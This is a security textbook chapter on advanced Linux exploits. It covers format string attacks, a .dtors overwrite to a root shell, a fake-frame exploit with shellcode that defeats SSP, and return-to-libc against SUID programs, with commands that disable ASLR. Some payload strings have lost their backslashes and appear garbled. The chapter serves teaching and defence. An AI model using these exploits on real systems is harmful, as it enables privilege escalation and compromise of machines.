CHAPTER 12
Advanced Linux Exploits

Now that you have the basics under your belt from reading Chapter 11, you are ready to study more advanced Linux exploits. The field is advancing constantly, and there are always new techniques discovered by the hackers and countermeasures implemented by developers. No matter which side you approach the problem from, you need to move beyond the basics. That said, we can only go so far in this book; your journey is only beginning. The “References” sections will give you more destinations to explore.

In this chapter, we cover the following types of advanced Linux exploits:

• Format string exploits

• Memory protection schemes

Format String Exploits

Format string exploits became public in late 2000. Unlike buffer overflows, format string errors are relatively easy to spot in source code and binary analysis. Once spotted, they are usually eradicated quickly. Because they are more likely to be found by automated processes, as discussed in later chapters, format string errors appear to be on the decline. That said, it is still good to have a basic understanding of them because you never know what will be found tomorrow. Perhaps you might find a new format string error!

The Problem

Format strings are found in format functions. In other words, the function may behave in many ways depending on the format string provided. Following are some of the many format functions that exist (see the “References” section for a more complete list):

printf() Prints output to standard input/output handle (STDIO-usually the screen)

fprintf() Prints output to a file stream

sprintf() Prints output to a string

snprintf() Prints output to a string with length checking built in

Format Strings

As you may recall from Chapter 10, the printf() function may have any number of arguments. We will discuss two forms here:


   printf(<format string>, <list of variables/values>);
   printf(<user supplied string>);

The first form is the most secure way to use the printf() function because the programmer explicitly specifies how the function is to behave by using a format string (a series of characters and special format tokens).

Table 12-1 introduces two more format tokens, %hn and <number>$, that may be used in a format string (the four originally listed in Table 10-4 are included for your convenience).

The Correct Way

Recall the correct way to use the printf() function. For example, the following code:


   //fmt1.c
   main() {
     printf("This is a %s. ", "test");
   }

produces the following output:


   $gcc -o fmt1 fmt1.c
   $./fmt1
   This is a test.

The Incorrect Way

Now take a look at what happens if we forget to add a value for the %s to replace:


   // fmt2.c
   main() {
     printf("This is a %s. ");
   }
   $ gcc -o fmt2 fmt2.c
   $./fmt2
   This is a fy¿.

Image

Table 12-1 Commonly Used Format Symbols

What was that? Looks like Greek, but actually, it’s machine language (binary), shown in ASCII. In any event, it is probably not what you were expecting. To make matters worse, consider what happens if the second form of printf() is used like this:


   //fmt3.c
   main(int argc, char * argv[]){
     printf(argv[1]);
   }

If the user runs the program like this, all is well:


   $gcc -o fmt3 fmt3.c
   $./fmt3 Testing
   Testing#

The cursor is at the end of the line because we did not use a n carriage return as before. But what if the user supplies a format string as input to the program?


   $gcc -o fmt3 fmt3.c
   $./fmt3 Testing%s
   TestingYyy´¿y#

Wow, it appears that we have the same problem. However, it turns out this latter case is much more deadly because it may lead to total system compromise. To find out what happened here, we need to learn how the stack operates with format functions.

Stack Operations with Format Functions

To illustrate the function of the stack with format functions, we will use the following program:


   //fmt4.c
   main(){
      int one=1, two=2, three=3;
      printf("Testing %d, %d, %d! ", one, two, three);
   }
   $gcc -o fmt4.c
   ./fmt4
   Testing 1, 2, 3!

During execution of the printf() function, the stack looks like Figure 12-1.

As always, the parameters of the printf() function are pushed on the stack in reverse order, as shown in Figure 12-1. The addresses of the parameter variables are used. The printf() function maintains an internal pointer that starts out pointing to the format string (or top of the stack frame) and then begins to print characters of the format string to the STDIO handle (the screen in this case) until it comes upon a special character.

Image

Figure 12-1 Depiction of the stack when printf() is executed

If the % is encountered, the printf() function expects a format token to follow and thus increments an internal pointer (toward the bottom of the stack frame) to grab input for the format token (either a variable or absolute value). Therein lies the problem: the printf() function has no way of knowing if the correct number of variables or values were placed on the stack for it to operate. If the programmer is sloppy and does not supply the correct number of arguments, or if the user is allowed to present their own format string, the function will happily move down the stack (higher in memory), grabbing the next value to satisfy the format string requirements. So what we saw in our previous examples was the printf() function grabbing the next value on the stack and returning it where the format token required.


Image

NOTE

The is handled by the compiler and used to escape the next character after the . This is a way to present special characters to a program and not have them interpreted literally. However, if a x is encountered, then the compiler expects a number to follow and converts that number to its hex equivalent before processing.


Implications

The implications of this problem are profound indeed. In the best case, the stack value may contain a random hex number that may be interpreted as an out-of-bounds address by the format string, causing the process to have a segmentation fault. This could possibly lead to a denial-of-service condition to an attacker.

In the worst case, however, a careful and skillful attacker may be able to use this fault to both read arbitrary data and write data to arbitrary addresses. In fact, if the attacker can overwrite the correct location in memory, the attacker may be able to gain root privileges.

Example Vulnerable Program

For the remainder of this section, we will use the following piece of vulnerable code to demonstrate the possibilities:


   //fmtstr.c
   #include <stdlib.h>
   int main(int argc, char *argv[]){
           static int canary=0;   // stores the canary value in .data section
           char temp[2048];       // string to hold large temp string
         strcpy(temp, argv[1]);   // take argv1 input and jam into temp
         printf(temp);            // print value of temp
         printf(" ");            // print carriage return
         printf("Canary at 0x%08x = 0x%08x ", &canary, canary); //print canary
   }
   #gcc -o fmtstr fmtstr.c
   #./fmtstr Testing
   Testing
   Canary at 0x08049440 = 0x00000000 
   #chmod u+s fmtstr
   #su joeuser
   $


Image

NOTE

The “Canary” value is just a placeholder for now. It is important to realize that your value will certainly be different. For that matter, your system may produce different values for all the examples in this chapter; however, the results should be the same.


Reading from Arbitrary Memory

We will now begin to take advantage of the vulnerable program. We will start slowly and then pick up speed. Buckle up, here we go!

Using the %x Token to Map Out the Stack

As shown in Table 12-1, the %x format token is used to provide a hex value. So, by supplying a few %08x tokens to our vulnerable program, we should be able to dump the stack values to the screen:


   $ ./fmtstr "AAAA %08x %08x %08x %08x"
   AAAA bffffd2d 00000648 00000774 41414141
   Canary at 0x08049440 = 0x00000000
   $

The 08 is used to define precision of the hex value (in this case, 8 bytes wide). Notice that the format string itself was stored on the stack, proven by the presence of our AAAA (0x41414141) test string. The fact that the fourth item shown (from the stack) was our format string depends on the nature of the format function used and the location of the vulnerable call in the vulnerable program. To find this value, simply use brute force and keep increasing the number of %08x tokens until the beginning of the format string is found. For our simple example (fmtstr), the distance, called the offset, is defined as 4.

Using the %s Token to Read Arbitrary Strings

Because we control the format string, we can place anything in it we like (well, almost anything). For example, if we wanted to read the value of the address located in the fourth parameter, we could simply replace the fourth format token with a %s, as shown:


   $ ./fmtstr "AAAA %08x %08x %08x %s"
   Segmentation fault
   $

Why did we get a segmentation fault? Because, as you recall, the %s format token will take the next parameter on the stack, in this case the fourth one, and treat it like a memory address to read from (by reference). In our case, the fourth value is AAAA, which is translated in hex to 0x41414141, which (as we saw in the previous chapter) causes a segmentation fault.

Reading Arbitrary Memory

So how do we read from arbitrary memory locations? Simple: we supply valid addresses within the segment of the current process. We will use the following helper program to assist us in finding a valid address:


   $ cat getenv.c
   #include <stdlib.h>
   int main(int argc, char *argv[]){
           char * addr;  //simple string to hold our input in bss section
           addr = getenv(argv[1]);  //initialize the addr var with input
           printf("%s is located at %p ", argv[1], addr);//display location
   }
   $ gcc -o getenv getenv.c

The purpose of this program is to fetch the location of environment variables from the system. To test this program, let’s check for the location of the SHELL variable, which stores the location of the current user’s shell:


   $ ./getenv SHELL
   SHELL is located at 0xbffffd84

Now that we have a valid memory address, let’s try it. First, remember to reverse the memory location because this system is little-endian:


   $ ./fmtstr `printf "x84xfdxffxbf"`" %08x %08x %08x %s"
   ýÿ¿ bffffd2f 00000648 00000774 /bin/bash
   Canary at 0x08049440 = 0x00000000

Success! We were able to read up to the first NULL character of the address given (the SHELL environment variable). Take a moment to play with this now and check out other environment variables. To dump all environment variables for your current session, type env | more at the shell prompt.

Simplifying the Process with Direct Parameter Access

To make things even easier, you may even access the fourth parameter from the stack by what is called direct parameter access. The #$ format token is used to direct the format function to jump over a number of parameters and select one directly. For example:


   $cat dirpar.c
   //dirpar.c
   main(){
      printf ("This is a %3$s. ", 1, 2, "test");
   }
   $gcc -o dirpar dirpar.c
   $./dirpar
   This is a test.
   $

Now when you use the direct parameter format token from the command line, you need to escape the $ with a in order to keep the shell from interpreting it. Let’s put this all to use and reprint the location of the SHELL environment variable:


   $ ./fmtstr `printf "x84xfdxffxbf"`"%4$s"
   ýÿ¿/bin/bash
   Canary at 0x08049440 = 0x00000000

Notice how short the format string can be now.


Image

CAUTION

The preceding format works for bash. Other shells such as tcsh require other formats; for example:


   $ ./fmtstr `printf "x84xfdxffxbf"`'%4$s'

Notice the use of a single quote on the end. To make the rest of the chapter’s examples easy, use the bash shell.


Writing to Arbitrary Memory

For this example, we will try to overwrite the canary address 0x08049440 with the address of shellcode (which we will store in memory for later use). We will use this address because it is visible to us each time we run fmtstr, but later we will see how we can overwrite nearly any address.

Magic Formula

As shown by Blaess, Grenier, and Raynal (see “References”), the easiest way to write 4 bytes in memory is to split it up into two chunks (two high-order bytes and two low-order bytes) and then use the #$ and %hn tokens to put the two values in the right place.

For example, let’s put our shellcode from the previous chapter into an environment variable and retrieve the location:


   $ export SC=`cat sc`
   $ ./getenv SC
   SC is located at 0xbfffff50   !!!!!!yours will be different!!!!!!

If we wish to write this value into memory, we would split it into two values:

• Two high-order bytes (HOB): 0xbfff

• Two low-order bytes (LOB): 0xff50

As you can see, in our case, HOB is less than (<) LOB, so follow the first column in Table 12-2.

Now comes the magic. Table 12-2 presents the formula to help you construct the format string used to overwrite an arbitrary address (in our case, the canary address, 0x08049440).

Image

Table 12-2 The Magic Formula to Calculate Your Exploit Format String

Using the Canary Value to Practice

Using Table 12-2 to construct the format string, let’s try to overwrite the canary value with the location of our shellcode.


Image

CAUTION

At this point, you must understand that the names of our programs (getenv and fmtstr) need to be the same length. This is because the program name is stored on the stack on startup, and therefore the two programs will have different environments (and locations of the shellcode in this case) if their names are of different lengths. If you named your programs something different, you will need to play around and account for the difference or simply rename them to the same size for these examples to work.


To construct the injection buffer to overwrite the canary address 0x08049440 with 0xbfffff50, follow the formula in Table 12-2. Values are calculated for you in the right column and used here:


   $ ./fmtstr `printf
   "x42x94x04x08x40x94x04x08"`%.49143x%4$hn%.16209x%5$hn
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   0000000000000000000000000
   <truncated>
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000648
   Canary at 0x08049440 = 0xbfffff50


Image

CAUTION

Once again, your values will be different. Start with the getenv program, and then use Table 12-2 to get your own values. Also, there is actually no new line between the printf and the double quote.


Taking .dtors to root

Okay, so what? We can overwrite a staged canary value...big deal. It is a big deal because some locations are executable and, if overwritten, may lead to system redirection and execution of your shellcode. We will look at one of many such locations, called .dtors.

ELF32 File Format

When the GNU compiler creates binaries, they are stored in ELF32 file format. This format allows for many tables to be attached to the binary. Among other things, these tables are used to store pointers to functions the file may need often. There are two tools you may find useful when dealing with binary files:

nm Used to dump the addresses of the sections of the ELF32 format file

objdump Used to dump and examine the individual sections of the file

Let’s start with the nm tool:


   $ nm ./fmtstr |more
   08049448 D _DYNAMIC
   08049524 D _GLOBAL_OFFSET_TABLE_
   08048410 R _IO_stdin_used
            w _Jv_RegisterClasses
   08049514 d __CTOR_END__
   08049510 d __CTOR_LIST__
   0804951c d __DTOR_END__
   08049518 d __DTOR_LIST__
   08049444 d __EH_FRAME_BEGIN__
   08049444 d __FRAME_END__
   08049520 d __JCR_END__
   08049520 d __JCR_LIST__
   08049540 A __bss_start
   08049434 D __data_start
   080483c8 t __do_global_ctors_aux
   080482f4 t __do_global_dtors_aux
   08049438 d __dso_handle
            w __gmon_start__
            U __libc_start_main@@GLIBC_2.0
   08049540 A _edata
   08049544 A _end
   <truncated>

And to view a section, say .dtors, you would simply use the objdump tool:


   $ objdump -s -j .dtors ./fmtstr

   ./fmtstr:          file format elf32-i386

   Contents of section .dtors:
    8049518 ffffffff 00000000                  ........
   $

DTOR Section

In C/C++, the destructor (DTOR) section provides a way to ensure that some process is executed upon program exit. For example, if you wanted to print a message every time the program exited, you would use the destructor section. The DTOR section is stored in the binary itself, as shown in the preceding nm and objdump command output. Notice how an empty DTOR section always starts and ends with 32-bit markers: 0xffffffff and 0x00000000 (NULL). In the preceding fmtstr case, the table is empty.

Compiler directives are used to denote the destructor as follows:


   $ cat dtor.c
   //dtor.c
   #include <stdio.h>

   static void goodbye(void) __attribute__ ((destructor));

   main(){
    printf("During the program, hello ");
    exit(0);
   }

   void goodbye(void){
           printf("After the program, bye ");
   }
   $ gcc -o dtor dtor.c
   $ ./dtor
   During the program, hello
   After the program, bye

Now let’s take a closer look at the file structure by using nm and grepping for the pointer to the goodbye() function:


   $ nm ./dtor | grep goodbye
   08048386 t goodbye

Next, let’s look at the location of the DTOR section in the file:


   $ nm ./dtor |grep DTOR
   08049508 d __DTOR_END__
   08049500 d __DTOR_LIST__

Finally, let’s check the contents of the .dtors section:


   $ objdump -s -j .dtors ./dtor
   ./dtor:  file format elf32-i386
   Contents of section .dtors:
   8049500 ffffffff 86830408 00000000        ............
   $

Yep, as you can see, a pointer to the goodbye() function is stored in the DTOR section between the 0xffffffff and 0x00000000 markers. Again, notice the little-endian notation.

Putting It All Together

Now back to our vulnerable format string program, fmtstr. Recall the location of the DTORS section:


   $ nm ./fmtstr |grep DTOR   #notice how we are only interested in DTOR
   0804951c d __DTOR_END__
   08049518 d __DTOR_LIST__

and the initial values (empty):


   $ objdump -s -j .dtors ./fmtstr
   ./fmtstr:  file format elf32-i386
   Contents of section .dtors:
    8049518 ffffffff 00000000        ........
   $

It turns out that if we overwrite either an existing function pointer in the DTOR section or the ending marker (0x00000000) with our target return address (in this case, our shellcode address), the program will happily jump to that location and execute. To get the first pointer location or the end marker, simply add 4 bytes to the __DTOR_ LIST__ location. In our case, this is

0x08049518 + 4 = 0x0804951c (which goes in our second memory slot, bolded in the following code)

Follow the same first column of Table 12-2 to calculate the required format string to overwrite the new memory address 0x0804951c with the same address of the shell-code as used earlier: 0xbfffff50 in our case. Here goes!


   $  ./fmtstr `printf
   "x1ex95x04x08x1cx95x04x08"`%.49143x%4$hn%.16209x%5$hn
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000
   <truncated>
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   000000000000000000000000000000000000000000000000000000000000000000000000000
   0000000000000000000000000000648
   Canary at 0x08049440 = 0x00000000
   sh-2.05b# whoami
   root
   sh-2.05b# id -u
   0
   sh-2.05b# exit
   exit
   $

Success! Relax, you earned it.

There are many other useful locations to overwrite; for example:

• Global offset table

• Global function pointers

atexit handlers

• Stack values

• Program-specific authentication variables

And there are many more; see “References” for more ideas.

References

Exploiting Software: How to Break Code (Greg Hoglund and Gary McGraw) Addison-Wesley, 2004

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003

“Overwriting the .dtors Section” (Juan M. Bello Rivas) www.cash.sopot.kill.pl/bufer/dtors.txt

“Secure Programming, Part 4: Format Strings” (Blaess, Grenier, and Raynal) www.cgsecurity.org/Articles/SecProg/Art4/

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes (Jack Koziol et al.) Wiley, 2004

“When Code Goes Wrong – Format String Exploitation” (DangerDuo) www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid= 7949&mode=thread&order=0&thold=0

Memory Protection Schemes

Since buffer overflows and heap overflows have come to be, many programmers have developed memory protection schemes to prevent these attacks. As we will see, some work, some don’t.

Compiler Improvements

Several improvements have been made to the gcc compiler, starting in GCC 4.1.

Libsafe

Libsafe is a dynamic library that allows for the safer implementation of the following dangerous functions:

• strcpy()

• strcat()

• sprintf(), vsprintf()

• getwd()

• gets()

• realpath()

• fscanf(), scanf(), sscanf()

Libsafe overwrites these dangerous libc functions, replacing the bounds and input scrubbing implementations, thereby eliminating most stack-based attacks. However, there is no protection offered against the heap-based exploits described in this chapter.

StackShield, StackGuard, and Stack Smashing Protection (SSP)

StackShield is a replacement to the gcc compiler that catches unsafe operations at compile time. Once installed, the user simply issues shieldgcc instead of gcc to compile programs. In addition, when a function is called, StackShield copies the saved return address to a safe location and restores the return address upon returning from the function.

StackGuard was developed by Crispin Cowan of Immunix.com and is based on a system of placing “canaries” between the stack buffers and the frame state data. If a buffer overflow attempts to overwrite saved eip, the canary will be damaged and a violation will be detected.

Stack Smashing Protection (SSP), formerly called ProPolice, is now developed by Hiroaki Etoh of IBM and improves on the canary-based protection of StackGuard by rearranging the stack variables to make them more difficult to exploit. In addition, a new prolog and epilog are implemented with SSP.

The following is the previous prolog:

Image

The new prolog is

Image

As shown in Figure 12-2, a pointer is provided to ArgC and checked after the return of the application, so the key is to control that pointer to ArgC, instead of saved Ret.

Because of this new prolog, a new epilog is created:

Image

Back in Chapter 11, we discussed how to handle overflows of small buffers by using the end of the environment segment of memory. Now that we have a new prolog and epilog, we need to insert a fake frame including a fake Ret and fake ArgC, as shown in Figure 12-3.

Image

Figure 12-2 Old and new prolog

Image

Figure 12-3 Using a fake frame to attack small buffers

Using this fake frame technique, we can control the execution of the program by jumping to the fake ArgC, which will use the fake Ret address (the actual address of the shellcode). The source code of such an attack follows:


   $ cat exploit2.c
   //exploit2.c  works locally when the vulnerable buffer is small.
   #include <stdlib.h>
   #include <stdio.h>
   #include <unistd.h>
   #include <string.h>

   #define VULN "./smallbuff"
   #define SIZE 14

   /************************************************
    * The following format is used
    * &shellcode (eip) - must point to the shell code address
    * argc - not really using the contents here
    * shellcode
    * ./smallbuff
    ************************************************/
   char shellcode[] =  //Aleph1's famous shellcode, see ref.
     "xffxffxffxffxffxffxffxff" // place holder for &shellcode and argc
     "x31xc0x31xdbxb0x17xcdx80" //setuid(0) first
     "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
     "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
     "x80xe8xdcxffxffxff/bin/sh";
   int main(int argc, char **argv){
      // injection buffer
      char p[SIZE];
      // put the shellcode in target's envp
      char *env[] = { shellcode, NULL };
      int *ptr, i, addr,addr_argc,addr_eip;
      // calculate the exact location of the shellcode
      addr = 0xbffffffa - strlen(shellcode) - strlen(VULN);
      addr += 4;
      addr_argc = addr;
      addr_eip = addr_argc + 4;
      fprintf(stderr, "[***] using fake argc address: %#010x ", addr_argc);
      fprintf(stderr, "[***] using shellcode address: %#010x ", addr_eip);
      // set the address for the modified argc
      shellcode[0] = (unsigned char)(addr_eip & 0x000000ff);
      shellcode[1] = (unsigned char)((addr_eip & 0x0000ff00)>>8); 
      shellcode[2] = (unsigned char)((addr_eip & 0x00ff0000)>>16);
      shellcode[3] = (unsigned char)((addr_eip & 0xff000000)>>24);

   /* fill buffer with computed address */
   /* alignment issues, must offset by two */
      p[0]='A';
      p[1]='A';
      ptr = (int * )&p[2];
      
      for (i = 2; i < SIZE; i += 4){
         *ptr++ = addr;
      }
      /* this is the address for exploiting with
       * gcc -mpreferred-stack-boundary=2 -o smallbuff smallbuff.c */
      *ptr = addr_eip;

      //call the program with execle, which takes the environment as input
      execle(VULN,"smallbuff",p,NULL, env);
      exit(1);
   }


Image

NOTE

The preceding code actually works for both cases, with and without stack protection on. This is a coincidence, due to the fact that it takes 4 bytes less to overwrite the pointer to ArgC than it did to overwrite saved Ret under the previous way of performing buffer overflows.


The preceding code can be executed as follows:


   # gcc -o exploit2 exploit2.c
   #chmod u+s exploit2
   #su joeuser //switch to a normal user (any)
   $ ./exploit2
   [***] using fake argc address: 0xbfffffc2
   [***] using shellcode address: 0xbfffffc6
   sh-2.05b# whoami
   root
   sh-2.05b# exit
   exit
   $exit

SSP has been incorporated in GCC (starting in version 4.1) and is on by default. It may be disabled with the –fno-stack-protector flag.

You may check for the use of SSP by using the objdump tool:


   joe@BT(/tmp):$ objdump –d test | grep stack_chk_fail
   080482e8 <__stack_chk_fail@plt>:
    80483f8:  e8 eb fe ff ff  call  80482e8 <__stack_chk_fail@plt>

Notice the call to the stack_chk_fail@plt function, compiled into the binary.


Image

NOTE

As implied by their names, none of the tools described in this section offers any protection against heap-based attacks.


Non-Executable Stack (gcc based)

GCC has implemented a non-executable stack, using the GNU_STACK ELF markings. This feature is on by default (starting in version 4.1) and may be disabled with the –z execstack flag, as shown here:


   joe@BT(/tmp):$ gcc –o test test.c && readelf –l test | grep -i stack
     GNU_STACK  0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4
   joe@BT(/tmp):$ gcc -z execstack –o test test.c && readelf –l test | grep -i stack
     GNU_STACK  0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

Notice that in the first command the RW flag is set in the ELF markings, and in the second command (with the –z execstack flag) the RWE flag is set in the ELF markings. The flags stand for read (R), write (W), and execute (E).

Kernel Patches and Scripts

There are many protection schemes introduced by kernel-level patches and scripts; however, we will mention only a few of them.

Non-Executable Memory Pages (Stacks and Heaps)

Early on, developers realized that program stacks and heaps should not be executable and that user code should not be writable once it is placed in memory. Several implementations have attempted to achieve these goals.

The Page-eXec (PaX) patches attempt to provide execution control over the stack and heap areas of memory by changing the way memory paging is done. Normally, a page table entry (PTE) exists for keeping track of the pages of memory and caching mechanisms called data and instruction translation look-aside buffers (TLBs). The TLBs store recently accessed memory pages and are checked by the processor first when accessing memory. If the TLB caches do not contain the requested memory page (a cache miss), then the PTE is used to look up and access the memory page. The PaX patch implements a set of state tables for the TLB caches and maintains whether a memory page is in read/write mode or execute mode. As the memory pages transition from read/ write mode into execute mode, the patch intervenes, logging and then killing the process making this request. PaX has two methods to accomplish non-executable pages. The SEGMEXEC method is faster and more reliable, but splits the user space in half to accomplish its task. When needed, PaX uses a fallback method, PAGEEXEC, which is slower but also very reliable.

Red Hat Enterprise Server and Fedora offer the ExecShield implementation of non-executable memory pages. Although quite effective, it has been found to be vulnerable under certain circumstances and to allow data to be executed.

Address Space Layout Randomization (ASLR)

The intent of ASLR is to randomize the following memory objects:

• Executable image

• Brk()-managed heap

• Library images

• Mmap()-managed heap

• User space stack

• Kernel space stack

PaX, in addition to providing non-executable pages of memory, fully implements the preceding ASLR objectives. grsecurity (a collection of kernel-level patches and scripts) incorporates PaX and has been merged into many versions of Linux. Red Hat and Fedora use a Position Independent Executable (PIE) technique to implement ASLR. This technique offers less randomization than PaX, although they protect the same memory areas. Systems that implement ASLR provide a high level of protection from “return into libc” exploits by randomizing the way the function pointers of libc are called. This is done through the randomization of the mmap() command and makes finding the pointer to system() and other functions nearly impossible. However, using brute-force techniques to find function calls like system() is possible.

On Debian- and Ubuntu-based systems, the following command can be used to disable ASLR:


  root@quazi(/tmp):# echo 0 > /proc/sys/kernel/randomize_va_space

On Red Hat–based systems, the following commands can be used to disable ASLR:


   root@quazi(/tmp):# echo 1 > /proc/sys/kernel/exec-shield
   root@quazi(/tmp):# echo 1 > /proc/sys/kernel/exec-shield-randomize

Return to libc Exploits

“Return to libc” is a technique that was developed to get around non-executable stack memory protection schemes such as PaX and ExecShield. Basically, the technique uses the controlled eip to return execution into existing glibc functions instead of shellcode. Remember, glibc is the ubiquitous library of C functions used by all programs. The library has functions like system() and exit(), both of which are valuable targets. Of particular interest is the system() function, which is used to run programs on the system. All you need to do is munge (shape or change) the stack to trick the system() function into calling a program of your choice, say /bin/sh.

To make the proper system() function call, we need our stack to look like this:

Image

We will overflow the vulnerable buffer and exactly overwrite the old saved eip with the address of the glibc system() function. When our vulnerable main() function returns, the program will return into the system() function as this value is popped off the stack into the eip register and executed. At this point, the system() function will be entered and the system() prolog will be called, which will build another stack frame on top of the position marked “Filler,” which for all intents and purposes will become our new saved eip (to be executed after the system() function returns). Now, as you would expect, the arguments for the system() function are located just below the new saved eip (marked “Filler” in the diagram). Since the system() function is expecting one argument (a pointer to the string of the filename to be executed), we will supply the pointer of the string “/bin/sh” at that location. In this case, we don’t actually care what we return to after the system function executes. If we did care, we would need to be sure to replace Filler with a meaningful function pointer like exit().

Let’s look at an example on a Slax bootable CD (BackTrack v.2.0):


   BT book $ uname -a
   Linux BT 2.6.18-rc5 #4 SMP Mon Sep 18 17:58:52 GMT 2006 i686 i686 i386 GNU/
   Linux
   BT book $ cat /etc/slax-version
   SLAX 6.0.0


Image

NOTE

Stack randomization makes these types of attacks very hard (not impossible) to do. Basically, brute force needs to be used to guess the addresses involved, which greatly reduces your odds of success. As it turns out, the randomization varies from system to system and is not truly random.


Start by switching user to root and turning off stack randomization:


   BT book $ su
   Password: ****
   BT book # echo 0 > /proc/sys/kernel/randomize_va_space

Take a look at the following vulnerable program:


   BT book #cat vuln2.c
   /* small buf vuln prog */
   int main(int argc, char * argv[]){
    char buffer[7];
    strcpy(buffer, argv[1]);
    return 0;
   }

As you can see, this program is vulnerable due to the strcpy command that copies argv[1] into the small buffer. Compile the vulnerable program, set it as SUID, and return to a normal user account:


   BT book # gcc  -o vuln2 vuln2.c
   BT book # chown root.root vuln2
   BT book # chmod +s vuln2
   BT book # ls -l vuln2
   -rwsr-sr-x 1 root root 8019 Dec 19 19:40 vuln2* 
   BT book # exit
   exit
   BT book $

Now we are ready to build the “return to libc” exploit and feed it to the vuln2 program. We need the following items to proceed:

• Address of glibc system() function

• Address of the string “/bin/sh”

It turns out that functions like system() and exit() are automatically linked into binaries by the gcc compiler. To observe this fact, start the program with gdb in quiet mode. Set a breakpoint on main(), and then run the program. When the program halts on the breakpoint, print the locations of the glibc function called system().


   BT book $ gdb  -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main
   Breakpoint 1 at 0x80483aa
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p system
   $1 = {<text variable, no debug info>} 0xb7ed86e0 <system>
   (gdb) q
   The program is running.  Exit anyway? (y or n) y
   BT book $

Another cool way to get the locations of functions and strings in a binary is by searching the binary with a custom program as follows:


   BT book $ cat search.c

   /* Simple search routine, based on Solar Designer's lpr exploit.  */
   #include <stdio.h>
   #include <dlfcn.h>
   #include <signal.h>
   #include <setjmp.h>

   int step;
   jmp_buf env;

   void fault() {
      if (step<0)
         longjmp(env,1);
      else {
         printf("Can't find /bin/sh in libc, use env instead... ");
         exit(1);
      }
   }

   int main(int argc, char **argv) {
      void *handle;
      int *sysaddr, *exitaddr;
      long shell; 
      char examp[512];
      char *args[3];
      char *envs[1];
      long *lp;
      
      handle=dlopen(NULL,RTLD_LOCAL);

      *(void **)(&sysaddr)=dlsym(handle,"system");
      sysaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
      printf("system() found at %08x ",sysaddr);

      *(void **)(&exitaddr)=dlsym(handle,"exit");
      exitaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
      printf("exit() found at %08x ",exitaddr);

      // Now search for /bin/sh using Solar Designer's approach
      if (setjmp(env))
         step=1;
      else
         step=-1;
      shell=(int)sysaddr;
      signal(SIGSEGV,fault);
      do
         while (memcmp((void *)shell, "/bin/sh", 8)) shell+=step;
      //check for null byte
      while (!(shell & 0xff) || !(shell & 0xff00) || !(shell & 0xff0000)
            || !(shell & 0xff000000));
      printf(""/bin/sh " found at %08x ",shell+16384); // 16384=0x4000=base addr
   }

The preceding program uses the dlopen() and dlsym() functions to handle objects and symbols located in the binary. Once the system() function is located, the memory is searched in both directions, looking for the existence of the “/bin/sh” string. The “/ bin/sh” string can be found embedded in glibc and keeps the attacker in this case from depending on access to environment variables to complete the attack. Finally, the value is checked to see if it contains a NULL byte and the location is printed. You may customize the preceding program to look for other objects and strings. Let’s compile the preceding program and test-drive it:


   BT book $
   BT book $ gcc -o search -ldl search.c
   BT book $ ./search
   system() found at b7ed86e0
   exit() found at b7ece3a0
   "/bin/sh" found at b7fc04c7

A quick check of the preceding gdb value shows the same location for the system() function: success!

We now have everything required to successfully attack the vulnerable program using the return to libc exploit. Putting it all together, we see


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "xe0x86xedxb7","BBBB","xc7x04xfcxb7"'`
   sh-3.1$ id
   uid=1001(joe) gid=100(users) groups=100(users)
   sh-3.1$ exit 
   exit
   Segmentation fault
   BT book $

Notice that we got a user-level shell (not root), and when we exited from the shell, we got a segmentation fault. Why did this happen? The program crashed when we left the user-level shell because the filler we supplied (0x42424242) became the saved eip to be executed after the system() function. So, a crash was the expected behavior when the program ended. To avoid that crash, we will simply supply the pointer to the exit() function in that filler location:


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   xe0x86xedxb7","xa0xe3xecxb7","xc7x04xfcxb7"'`
   sh-3.1# id
   uid=0(root) gid=0(root) groups=100(users)
   sh-3.1# exit
   exit
   BT book $

As for the lack of root privilege, the system() function drops privileges when it calls a program. To get around this, we need to use a wrapper program, which will contain the system function call. Then, we will call the wrapper program with the execl() function that does not drop privileges. The wrapper will look like this:


   BT book $ cat wrapper.c
   int main(){
      setuid(0);
      setgid(0);
      system("/bin/sh");
   }
   BT book $ gcc -o wrapper wrapper.c

Notice that we do not need the wrapper program to be SUID. Now we need to call the wrapper with the execl() function like this:


   execl("./wrapper", "./wrapper", NULL)

We now have another issue to work through: the execl() function contains a NULL value as the last argument. We will deal with that in a moment. First, let’s test the execl() function call with a simple test program and ensure that it does not drop privileges when run as root:


   BT book $ cat test_execl.c
   int main(){
      execl("./wrapper", "./wrapper", 0);
   }

Compile and make SUID like the vulnerable program vuln2.c:


   BT book $ gcc -o test_execl test_execl.c
   BT book $ su
   Password: ****
   BT book # chown root.root test_execl
   BT book # chmod +s test_execl
   BT book # ls -l test_execl
   -rwsr-sr-x 1 root root 8039 Dec 20 00:59 test_execl*
   BT book # exit
   exit

Run it to test the functionality:


   BT book $ ./test_execl
   sh-3.1# id
   uid=0(root) gid=0(root) groups=100(users)
   sh-3.1# exit
   exit
   BT book $

